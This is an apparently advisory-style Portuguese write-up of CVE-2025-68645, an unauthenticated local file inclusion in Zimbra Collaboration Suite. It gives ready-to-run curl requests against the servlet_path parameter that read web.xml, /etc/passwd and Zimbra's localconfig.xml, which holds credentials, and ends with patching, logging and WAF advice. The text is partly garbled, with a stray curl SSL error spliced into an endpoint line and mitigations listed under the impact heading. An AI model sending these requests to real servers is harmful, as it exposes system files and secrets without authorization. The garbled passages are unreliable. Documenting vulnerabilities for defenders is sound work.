
CVE-2025-68645
Este documento descreve uma vulnerabilidade de Inclusão de Arquivo Local (LFI) que afeta o Zimbra Collaboration Suite.
O problema surge do tratamento inadequado do seguinte parâmetro:
/h/*?javax.servlet.include.servlet_path=
Isso permite que um usuário não autenticado acesse recursos internos da aplicação.
Requisição de teste:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"


Múltiplos endpoints processam o parâmetro vulnerável de forma diferente.
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/restSSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
A exploração bem-sucedida pode levar a:
Atualizar o Zimbra para versões corrigidas
Restringir o acesso a endpoints vulneráveis
Monitorar logs em busca de parâmetros suspeitos:
javax.servlet.include.servlet_pathImplantar regras de WAF para bloquear padrões maliciosos